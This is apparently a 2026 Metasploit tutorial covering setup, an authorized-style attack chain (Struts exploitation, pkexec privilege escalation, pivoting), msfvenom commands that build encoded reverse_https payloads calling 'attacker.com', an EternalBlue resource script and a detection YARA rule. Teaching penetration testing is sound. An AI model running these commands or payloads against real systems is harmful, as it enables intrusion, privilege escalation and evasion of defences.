Metasploit Framework: Complete Beginner to Advanced Guide 2026

Disclaimer: This content is for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal. Always obtain proper written authorization before conducting penetration tests.

In June 2026, Metasploit Framework remains the undisputed champion of penetration testing tools, powering everything from junior pentester assessments to sophisticated red team operations. With the recent release of Metasploit 7.x and its enhanced evasion capabilities, understanding this framework has never been more critical for security professionals.

This comprehensive guide will take you from your first msfconsole launch to advanced post-exploitation techniques, custom module development, and real-world attack chain construction. Whether you’re preparing for OSCP, building your red team toolkit, or strengthening your organization’s defenses by understanding attacker methodologies, this guide delivers actionable knowledge.

Understanding Metasploit Architecture

Before diving into commands, understanding Metasploit’s architecture separates competent operators from script kiddies. The framework operates on a modular architecture comprising several key components:

• Exploits: Code that takes advantage of vulnerabilities to gain access
• Payloads: Code delivered and executed on the target after successful exploitation
• Auxiliary Modules: Supporting modules for scanning, fuzzing, and enumeration
• Post-Exploitation Modules: Actions performed after gaining initial access
• Encoders: Transform payloads to evade detection
• Nops: No-operation instructions for payload padding

The framework’s database backend (PostgreSQL) enables persistent storage of discovered hosts, services, credentials, and loot across engagements. This becomes invaluable during multi-day assessments.

Installation and Initial Configuration

While Metasploit comes pre-installed on Kali Linux 2026.2, proper configuration maximizes effectiveness. Here’s the complete setup process:

# Update Metasploit to latest version
sudo apt update && sudo apt install metasploit-framework

# Initialize the database
sudo msfdb init

# Verify database connectivity
sudo msfdb status

# Launch msfconsole
msfconsole

# Inside msfconsole, verify database connection
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.

For enterprise deployments, consider configuring Metasploit with external PostgreSQL instances and implementing workspace isolation for multi-client engagements.

Essential Commands and Workflow

Mastering Metasploit requires fluency in its command structure. The following workflow represents a typical penetration testing engagement:

Workspace Management

Workspaces isolate data between engagements, preventing cross-contamination of findings:

# Create a new workspace for the engagement
msf6 > workspace -a client_acme_2026
[*] Added workspace: client_acme_2026
[*] Workspace: client_acme_2026

# List all workspaces
msf6 > workspace
  default
* client_acme_2026

# Switch between workspaces
msf6 > workspace default
[*] Workspace: default

# Delete a workspace when engagement concludes
msf6 > workspace -d old_engagement

Target Discovery and Enumeration

Metasploit’s auxiliary modules provide powerful reconnaissance capabilities that integrate directly with the database:

# Import Nmap scan results
msf6 > db_import /path/to/nmap_scan.xml
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.15.4'
[*] Importing host 192.168.1.100
[*] Importing host 192.168.1.101

# View discovered hosts
msf6 > hosts

Hosts
=====

address         mac                name       os_name    os_flavor  os_sp  purpose  info
-------         ---                ----       -------    ---------  -----  -------  ----
192.168.1.100   00:0c:29:4a:2b:3c  dc01       Windows    2022       SP0    server
192.168.1.101   00:0c:29:5d:6e:7f  webserver  Linux      Ubuntu     22.04  server

# View discovered services
msf6 > services

Services
========

host            port   proto  name         state  info
----            ----   -----  ----         -----  ----
192.168.1.100   445    tcp    microsoft-ds open   Windows Server 2022
192.168.1.100   88     tcp    kerberos     open
192.168.1.101   80     tcp    http         open   Apache httpd 2.4.52
192.168.1.101   22     tcp    ssh          open   OpenSSH 8.9p1

# Run auxiliary scanner directly
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(scanner/smb/smb_version) > run

Exploitation Fundamentals

With targets enumerated, exploitation begins. Understanding the exploit-payload relationship is critical for success.

Selecting and Configuring Exploits

The search command is your primary tool for finding relevant exploits:

# Search for exploits by CVE
msf6 > search cve:2024-21413

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/windows/fileformat/outlook_moniker     2024-02-13       excellent  No     Microsoft Outlook Moniker Link RCE

# Search by platform and type
msf6 > search type:exploit platform:windows smb

# Search by description keywords
msf6 > search eternal blue

# Get detailed information about a module
msf6 > info exploit/windows/smb/ms17_010_eternalblue

Understanding Payload Types

Payload selection significantly impacts operation success. Metasploit offers three payload categories:

• Singles: Self-contained payloads (e.g., windows/exec)
• Stagers: Small payloads that establish connection for larger stages (e.g., windows/meterpreter/reverse_tcp)
• Stages: Downloaded by stagers, contain full functionality

For modern environments with EDR solutions, stageless payloads often perform better:

# Compare staged vs stageless payloads
msf6 > use payload/windows/x64/meterpreter/reverse_tcp
# Staged: smaller initial payload, downloads meterpreter stage

msf6 > use payload/windows/x64/meterpreter_reverse_tcp
# Stageless: complete payload, single transmission

Real-World Attack Scenario: Corporate Network Penetration

Let’s walk through a realistic attack chain against a corporate environment with proper authorization. This scenario demonstrates methodology rather than specific vulnerabilities.

Phase 1: Initial Access via Web Application

# Scenario: Discovered vulnerable Apache Struts server
msf6 > use exploit/multi/http/struts2_content_type_ognl
msf6 exploit(multi/http/struts2_content_type_ognl) > set RHOSTS 192.168.1.101
msf6 exploit(multi/http/struts2_content_type_ognl) > set RPORT 8080
msf6 exploit(multi/http/struts2_content_type_ognl) > set TARGETURI /struts2-showcase/
msf6 exploit(multi/http/struts2_content_type_ognl) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/struts2_content_type_ognl) > set LHOST 10.10.14.50
msf6 exploit(multi/http/struts2_content_type_ognl) > set LPORT 443
msf6 exploit(multi/http/struts2_content_type_ognl) > exploit

[*] Started reverse TCP handler on 10.10.14.50:443
[*] Sending exploit request...
[*] Sending stage (3045380 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (10.10.14.50:443 -> 192.168.1.101:49521)

meterpreter >

Phase 2: Post-Exploitation Enumeration

# Basic system information
meterpreter > sysinfo
Computer     : webserver
OS           : Ubuntu 22.04 (Linux 5.15.0-91-generic)
Architecture : x64
Meterpreter  : x64/linux

# Check current user privileges
meterpreter > getuid
Server username: www-data

# Enumerate network configuration
meterpreter > ifconfig

Interface  1
============
Name         : eth0
Hardware MAC : 00:0c:29:5d:6e:7f
IPv4 Address : 192.168.1.101
IPv4 Netmask : 255.255.255.0

# Search for sensitive files
meterpreter > search -f *.conf -d /etc
meterpreter > search -f *password* -d /var/www

# Upload enumeration scripts
meterpreter > upload /opt/linpeas.sh /tmp/
meterpreter > shell
$ chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh

Phase 3: Privilege Escalation

# Return to meterpreter and check for local exploits
meterpreter > background
[*] Backgrounding session 1...

msf6 > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.1.101 - Collecting local exploits for x64/linux...
[*] 192.168.1.101 - 42 exploit checks are being tried...
[+] 192.168.1.101 - exploit/linux/local/pkexec: The target appears to be vulnerable.
[+] 192.168.1.101 - exploit/linux/local/sudo_baron_samedit: The target appears to be vulnerable.

# Attempt privilege escalation
msf6 > use exploit/linux/local/pkexec
msf6 exploit(linux/local/pkexec) > set SESSION 1
msf6 exploit(linux/local/pkexec) > set LHOST 10.10.14.50
msf6 exploit(linux/local/pkexec) > set LPORT 4444
msf6 exploit(linux/local/pkexec) > exploit

[*] Started reverse TCP handler on 10.10.14.50:4444
[*] Running automatic check...
[+] The target appears to be vulnerable.
[*] Executing exploit...
[*] Sending stage (3045380 bytes) to 192.168.1.101
[*] Meterpreter session 2 opened

meterpreter > getuid
Server username: root

Phase 4: Lateral Movement

With root access on the web server, pivot to internal network targets:

# Add route through compromised host
msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 2
msf6 post(multi/manage/autoroute) > set SUBNET 10.10.10.0
msf6 post(multi/manage/autoroute) > run

[*] Running module against webserver
[*] Adding route to 10.10.10.0/255.255.255.0 via 192.168.1.101
[+] Route added successfully.

# Set up SOCKS proxy for tool pivoting
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
msf6 auxiliary(server/socks_proxy) > run -j

# Scan internal network through pivot
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.10.10.0/24
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 22,80,443,445,3389
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 10.10.10.50:445 - TCP OPEN
[+] 10.10.10.50:3389 - TCP OPEN

Advanced Techniques: Evasion and Custom Payloads

Modern environments deploy sophisticated detection capabilities. Metasploit 7.x introduces enhanced evasion techniques:

Payload Encoding and Encryption

# Generate encoded payload with multiple iterations
msf-venom -p windows/x64/meterpreter/reverse_https \
  LHOST=attacker.com LPORT=443 \
  -e x64/xor_dynamic -i 5 \
  -f exe -o payload.exe

# Generate encrypted payload (Metasploit 7.x)
msf-venom -p windows/x64/meterpreter/reverse_https \
  LHOST=attacker.com LPORT=443 \
  --encrypt aes256 --encrypt-key $(openssl rand -hex 32) \
  -f exe -o encrypted_payload.exe

# Use payload within resource script for automation
cat << 'EOF' > engagement.rc
workspace -a target_corp
db_import /tmp/nmap_results.xml
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS file:/tmp/smb_targets.txt
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 10.10.14.50
set LPORT 443
set AutoRunScript post/windows/manage/migrate
run -j
EOF

msfconsole -r engagement.rc

Custom Module Development

For unique vulnerabilities, custom module development becomes necessary:

# Basic auxiliary module template
# Save to ~/.msf4/modules/auxiliary/scanner/custom/example.rb

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Custom Vulnerability Scanner',
      'Description'    => %q{
        This module scans for a custom vulnerability in target application.
      },
      'Author'         => ['Your Name'],
      'License'        => MSF_LICENSE,
      'References'     => [
        ['CVE', '2026-XXXX'],
        ['URL', 'https://example.com/advisory']
      ]
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'Path to vulnerable application', '/']),
    ])
  end

  def run_host(ip)
    uri = normalize_uri(target_uri.path, 'vulnerable_endpoint')
    
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => uri,
    })

    if res && res.code == 200 && res.body.include?('vulnerable_pattern')
      print_good("#{ip}:#{rport} - Vulnerable!")
      report_vuln(
        host: ip,
        port: rport,
        name: 'Custom Vulnerability',
        refs: self.references
      )
    else
      print_status("#{ip}:#{rport} - Not vulnerable")
    end
  end
end

Defense Strategies: Detecting Metasploit Activity

Understanding attacker tools enables better defense. Here’s how defenders can detect and prevent Metasploit-based attacks:

Network-Level Detection

• Monitor for default Meterpreter traffic patterns: Default staging protocols have identifiable signatures
• Implement SSL/TLS inspection: Meterpreter HTTPS traffic often uses self-signed certificates
• Deploy network segmentation: Limit lateral movement opportunities
• Alert on unusual port usage: Common Metasploit ports (4444, 5555, 8080) should trigger alerts

Endpoint Detection

# YARA rule for detecting Meterpreter artifacts
rule Meterpreter_Reflective_Loader {
    meta:
        description = "Detects Meterpreter reflective DLL loader"
        author = "HackerXone Research"
        date = "2026-06-09"
    
    strings:
        $s1 = "ReflectiveLoader" ascii wide
        $s2 = { 4D 5A 90 00 03 00 00 00 }
        $s3 = "metsrv" ascii wide
        
    condition:
        uint16(0) == 0x5A4D and any of them
}

Proactive Security Measures

1. Patch management: Most Metasploit exploits target known vulnerabilities with available patches
2. Network segmentation: Implement zero-trust architecture limiting lateral movement
3. EDR deployment: Modern EDR solutions detect common Meterpreter behaviors
4. Application whitelisting: Prevent execution of unauthorized binaries
5. Regular penetration testing: Use Metasploit yourself to find weaknesses before attackers do

Metasploit Pro vs Framework: Enterprise Considerations

For organizational deployments, Metasploit Pro offers significant advantages:

• Web interface: Accessible to less CLI-proficient team members
• Automated reporting: Generate compliance-ready documentation
• Team collaboration: Shared workspaces and findings
• Credential management: Secure storage and reuse across engagements
• Social engineering campaigns: Built-in phishing capabilities

However, the open-source Framework remains essential for advanced operators requiring custom module development and maximum flexibility.

Key Takeaways

• Master the fundamentals: Understanding Metasploit’s architecture (exploits, payloads, auxiliaries, post modules) before attempting advanced techniques ensures consistent success
• Database integration is critical: Always initialize and utilize the PostgreSQL database for persistent storage of findings across engagement phases
• Workspace discipline prevents mistakes: Create separate workspaces for each engagement to maintain data isolation and client confidentiality
• Payload selection impacts success: Choose between staged and stageless payloads based on target environment, EDR presence, and network conditions
• Evasion requires constant evolution: Default payloads trigger most security solutions; invest time in encoding, encryption, and custom development
• Defenders benefit from attacker knowledge: Understanding Metasploit techniques enables better detection rules, incident response, and security architecture decisions
• Documentation enables reproducibility: Use resource scripts to automate and document attack chains for reporting and team knowledge sharing
• Ethical boundaries are non-negotiable: Always maintain written authorization and operate within defined scope—skills demonstrated here are powerful and demand responsibility

Metasploit Framework continues evolving with the threat landscape. As we move through 2026, staying current with new modules, evasion techniques, and defensive countermeasures remains essential for security professionals on both sides of the engagement.

Happy hunting—and stay ethical.